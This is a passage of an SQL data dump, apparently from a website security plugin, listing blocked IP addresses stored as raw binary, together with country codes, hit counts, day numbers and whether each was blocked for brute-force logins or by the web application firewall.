('\0\0\0\0\0\0\0\0\0\0ÿÿ-=»%', 'US', 2, 19809, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿª@Âo', 'AU', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ''>‰', 'PK', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿiœàØ', 'MA', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ½²', 'IT', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ°=žµ', 'HR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿPE>“', 'AZ', 3, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ²¨n”', 'MD', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÅûÊ', 'GH', 3, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ)BõÞ', 'GH', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-uÕM', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ''1‘\0', 'PK', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\ù†o', 'HU', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿz¨Q', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ%=u’', 'AZ', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ)Økr', 'RW', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1/Ú›', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÊ¤¶2', 'PH', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgàØá', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ•9Ü', 'NL', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^BÊ}', 'GR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿuÌªN', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÙB\\', 'HK', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 3, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŽ]ét', 'NL', 1, 19810, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 'BG', 8, 19810, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÐmâ.', 'US', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹Fû', 'IL', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿPAG|', 'BA', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¾\r†‚', 'CL', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 'BG', 53, 19815, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 'US', 40, 19815, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 2, 19791, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1é$Ö', 'CN', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+ðB3', 'IN', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ4¬––', 'IN', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+™"', 'CN', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[k–\\', 'DE', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJ0–', 'US', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ6%yï', 'FR', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1é$Ö', 'CN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/óþT', 'HK', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿKw–*', 'DE', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿeÉB#', 'CN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿª@„ ', 'AU', 2, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgv²', 'VN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃJ&«', 'SE', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg %J', 'ID', 2, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃn&¤', 'IR', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’¾Z#', 'SG', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1\0Ë', 'SG', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 2, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿv[', 'CN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿiž', 'IN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ''ib', 'CN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4e', 'DE', 1, 19792, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÏ Û;', 'US', 6, 19792, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿUÎª—', 'LT', 3, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿUË''ç', 'LV', 3, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’FVv', 'NL', 3, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg*8ý', 'VN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿk®BÌ', 'US', 2, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'US', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/[™W', 'HK', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 'BG', 53, 19792, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿw\Z-', 'HK', 2, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'US', 3, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥#', 'US', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg*8ý', 'VN', 2, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3ÃÛ ', 'FR', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿiž', 'IN', 2, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+™<', 'US', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿyt', 'CN', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3²’Ç', 'FR', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4e', 'DE', 1, 19793, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 'BG', 53, 19793, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹«Æ', 'IR', 2, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ&S‘', 'GB', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÁÊn', 'DK', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'US', 3, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgà÷ä', 'IN', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ{ù#', 'CN', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'NL', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹k,Ú', 'NL', 3, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[†øý', 'FR', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ4¬––', 'IN', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/óþT', 'HK', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‹;', 'IN', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿE¡Ý×', 'SG', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿE¡Ý×', 'SG', 3, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/òAÂ', 'HK', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ&S‘', 'GB', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿiž', 'IN', 2, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ£@F', 'FR', 4, 19794, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ)Á:', 'ZA', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'US', 2, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'US', 4, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[†øý', 'FR', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+™<', 'US', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ¯O', 'US', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ{ù#', 'CN', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ4¬––', 'IN', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ø6', 'BG', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Çç', 'SG', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 'BG', 53, 19794, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÆi', 'VN', 2, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥#', 'US', 2, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/óþT', 'HK', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 2, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÐWÎ´', 'HK', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/\\‡„', 'CN', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ“¶ÊÇ', 'US', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŸA€_', 'SG', 11, 19794, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿPMS', 'DE', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹‘', 'NL', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹…', 'GB', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ mô', 'TR', 2, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿˆ', 'GB', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‹c', 'SG', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÞ†\r', 'US', 1, 19794, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿPJŽd', 'CH', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 'PT', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿe"õj', 'CN', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJ0–', 'US', 4, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿk®BÌ', 'US', 5, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ)Á:', 'ZA', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÆi', 'VN', 2, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÐWÎ´', 'HK', 1, 19793, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ¯O', 'US', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŸKp3', 'CN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹«Æ', 'IR', 3, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿE¡Ý×', 'SG', 2, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÆi', 'VN', 3, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ4¬––', 'IN', 3, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÐWÎ´', 'HK', 2, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+™<', 'US', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ&S‘', 'GB', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥#', 'US', 3, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‹;', 'IN', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 2, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-œ¸', 'IR', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJ0–', 'US', 1, 19792, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÄôÀè', 'FI', 3, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3ÃÛ ', 'FR', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgv²', 'VN', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃn&¤', 'IR', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/òAÂ', 'HK', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ¯O', 'US', 3, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ–<£', 'JP', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÐWÎ´', 'HK', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ''aç\n', 'CN', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ•1¯', 'NL', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿk®BÌ', 'US', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'NL', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 'BG', 4, 19791, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ;*xz', 'CN', 1, 19791, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿD²„¥', 'US', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÆi', 'VN', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹«Æ', 'IR', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-L’‘', 'SG', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥#', 'US', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ''i+', 'CN', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+™<', 'US', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿE¡Ý×', 'SG', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ_Ù‘', 'FI', 2, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-Å8|', 'US', 1, 19791, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJÐ;ð', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg‘2E', 'IN', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¿`6È', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹kpÅ', 'DK', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ.Q“', 'DE', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í“ø', 'FR', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÞŽ’', 'US', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹ ­', 'DE', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+¹š', 'HK', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿžÜ};', 'DE', 15, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3Þž', 'CA', 3, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ''ß$', 'NL', 1, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ–žMª', 'CN', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3ON)', 'CA', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 'US', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹kqc', 'DK', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ„‘•', 'GB', 2, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿXTæ', 'DE', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+œ2', 'SG', 1, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 'BG', 53, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4e', 'DE', 3, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿžÜ}I', 'DE', 22, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿQ‘/', 'AT', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'US', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¦¨e', 'US', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ%»N‹', 'FR', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB†q', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-ž&', 'TR', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÎ½,', 'SG', 2, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[êÃ€', 'FR', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¤„ª', 'FR', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-O*S', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹kqc', 'DK', 2, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿìà', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT"“O', 'FI', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg’o', 'VN', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^WC', 'FR', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ“¶ÊÇ', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œDU', 'BG', 4, 19800, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 'DE', 2, 19812, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿKw“$', 'DE', 1, 19812, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 'SG', 49, 19807, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ"W“', 'SG', 1, 19821, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 'SG', 12, 19821, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 'IN', 7, 19821, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿpÄ	D', 'IN', 1, 19821, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 'BG', 59, 19822, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 1, 19822, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 'DE', 8, 19822, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 'FR', 1, 19822, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ>7', 'CH', 1, 19822, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-€`Ô', 'US', 4, 19822, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿz£B˜', 'IN', 1, 19822, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 'BG', 59, 19822, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿrtQä', 'CN', 1, 19822, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Çû‹', 'SG', 7, 19803, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 'DE', 4, 19803, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\÷×', 'BG', 30, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-O*S', 'US', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿWø™4', 'IR', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ°Añ¥', 'IR', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg’o', 'VN', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÑa‘^', 'US', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+€,ó', 'HK', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgx²Ù', 'IN', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 5, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'US', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Ç/ô', 'NL', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 'FR', 36, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃJ&«', 'SE', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÿ¢Ë', 'CH', 1, 19798, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\úŒ', 'BG', 8, 19798, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\5`‰', 'RU', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'US', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿAmd', 'FI', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 'BG', 4, 19812, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÎTf', 'US', 1, 19812, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 'DE', 15, 19807, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 'BG', 53, 19807, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 'DE', 2, 19807, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œDU', 'BG', 1, 19807, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 'DE', 15, 19812, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃJ&«', 'SE', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§c>', 'US', 2, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\÷×', 'BG', 30, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÑ¼Ú', 'US', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿtv2Â', 'VN', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 'DE', 4, 19801, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œD§', 'BG', 1, 19801, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ô2', 'BG', 4, 19801, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿTê`.', 'RO', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿXcó', 'DE', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ£@', 'FR', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 'DE', 3, 19798, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œDU', 'BG', 4, 19798, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB†q', 'US', 1, 19799, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÎí ', 'US', 1, 19799, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¦¨e', 'US', 1, 19799, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ½½à', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1+R', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-vÚ›', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿz¤R}', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿp…ö¥', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿuÏ¶7', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿUu8H', 'GE', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿµ.L', 'AR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿËÀñ[', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¾2èÍ', 'AR', 3, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¥2¼', 'SG', 1, 19817, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 'IN', 7, 19817, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgnVÙ', 'VN', 1, 19816, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿx„c1', 'CN', 1, 19817, 'brute'),
